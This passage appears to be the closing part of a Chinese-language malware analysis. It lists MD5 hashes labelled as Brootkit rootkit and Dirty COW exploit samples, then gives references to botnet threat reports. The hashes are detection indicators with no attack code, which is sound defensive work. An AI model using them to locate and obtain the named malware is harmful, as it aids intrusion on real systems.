c04dceb4c769b2c8823cbf39f3055e6d(Brootkit) ad593f6a17598bdd12fd3bd0f3b2a925(Brootkit) 20788d837f33f5e735bdc99d68fc71b1(Dirtycow) d9bbb758e3831839558d80f381f9d4b1(Dirtycow) 795acc900cb55882629e7ce3f65130c4(Dirtycow) 1195ea4886acf3a857913c448af78d11(Dirtycow) 参考资料: https://www.freebuf.com/articles/web/175626.html https://mp.weixin.qq.com/s/U3sODZCmCPIfFqjQgHpa0A https://zhuanlan.zhihu.com/p/68612894 https://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf